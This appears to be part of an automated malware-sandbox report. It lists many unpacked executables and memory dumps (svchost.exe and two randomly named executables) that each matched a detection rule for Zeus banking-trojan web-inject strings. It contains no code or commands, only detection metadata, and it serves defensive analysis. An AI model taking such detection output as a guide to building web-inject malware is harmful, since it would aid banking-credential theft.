Source: 2.3.svchost.exe.2700000.38.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.Z8eHwAvqAh.exe.61d8c0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.18.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.23.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.34.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 29.2.swvGCAxOMikYQeoQzimiprVu.exe.1202000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.20.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 33.2.swvGCAxOMikYQeoQzimiprVu.exe.12f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 25.2.swvGCAxOMikYQeoQzimiprVu.exe.1590000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 22.2.swvGCAxOMikYQeoQzimiprVu.exe.1282000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.34.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 35.2.swvGCAxOMikYQeoQzimiprVu.exe.20d0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.26.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.33.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 39.2.swvGCAxOMikYQeoQzimiprVu.exe.ed2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.88a000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 39.2.swvGCAxOMikYQeoQzimiprVu.exe.f30000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.889400.4.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.22.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.88a000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.37.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 37.2.swvGCAxOMikYQeoQzimiprVu.exe.b40000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 27.2.swvGCAxOMikYQeoQzimiprVu.exe.a42000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.2.Z8eHwAvqAh.exe.406400.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.10.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.25.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.8.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.32.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 37.2.swvGCAxOMikYQeoQzimiprVu.exe.b40000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.18.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.20.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.24.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 29.2.swvGCAxOMikYQeoQzimiprVu.exe.1202000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.35.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.2.Z8eHwAvqAh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.2.Z8eHwAvqAh.exe.407000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.884000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.889400.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.37.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.36.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.2.Z8eHwAvqAh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.889400.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.23.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.38.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 31.2.swvGCAxOMikYQeoQzimiprVu.exe.1110000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.28.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 31.2.swvGCAxOMikYQeoQzimiprVu.exe.10b2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.29.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.27.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.21.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.31.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 37.2.swvGCAxOMikYQeoQzimiprVu.exe.ae2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.36.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 29.2.swvGCAxOMikYQeoQzimiprVu.exe.12a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 27.2.swvGCAxOMikYQeoQzimiprVu.exe.ae0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 39.2.swvGCAxOMikYQeoQzimiprVu.exe.f30000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.15.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.25.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2500000.6.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.11.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.19.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.40.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.31.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.884000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 33.2.swvGCAxOMikYQeoQzimiprVu.exe.1292000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.26.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 31.2.swvGCAxOMikYQeoQzimiprVu.exe.1110000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 22.2.swvGCAxOMikYQeoQzimiprVu.exe.12e0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.33.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 27.2.swvGCAxOMikYQeoQzimiprVu.exe.ae0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.29.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 35.2.swvGCAxOMikYQeoQzimiprVu.exe.6a2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.884000.5.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.884000.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.39.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 22.2.swvGCAxOMikYQeoQzimiprVu.exe.1282000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 33.2.swvGCAxOMikYQeoQzimiprVu.exe.12f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.22.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.35.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2500000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.88a000.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 39.2.swvGCAxOMikYQeoQzimiprVu.exe.ed2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.21.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.19.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.3.Z8eHwAvqAh.exe.61e4c0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 1.2.Z8eHwAvqAh.exe.407000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 31.2.swvGCAxOMikYQeoQzimiprVu.exe.10b2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.9.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3eb0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.32.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2085406801.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2140868615.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2143770562.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2147781586.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2140232259.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2117066204.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2059054571.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000025.00000002.2136733036.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2122713392.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2148028123.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001F.00000002.2117128490.00000000010B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2113736321.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2145570394.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2148606748.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2145310985.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2149174831.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2138544966.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2144590215.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001B.00000002.2110291091.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2060969300.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1321020929.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2064310969.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000027.00000002.2141769100.0000000000F30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2144407040.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2139736993.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2106030537.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2145118910.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000027.00000002.2141687377.0000000000ED0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2148806310.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000019.00000002.2108549268.0000000001590000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000001.00000003.1299697107.0000000000618000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000021.00000002.2122586333.00000000012F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2148998484.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1318599040.0000000000884000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000023.00000002.2132206757.00000000020D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2092705470.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2144869622.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001D.00000002.2114094009.00000000012A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000025.00000002.2136949497.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2103159586.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2148222481.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001F.00000002.2117328795.0000000001110000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000023.00000002.2130828289.00000000006A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000016.00000002.2103444629.0000000001280000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2145950439.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2143582018.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2130882099.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000021.00000002.2122526350.0000000001290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2145767072.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000019.00000002.2107924454.0000000001530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001B.00000002.2110131950.0000000000A40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1318727770.0000000000884000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2110805717.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001D.00000002.2113959857.0000000001200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: Z8eHwAvqAh.exe PID: 7836, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
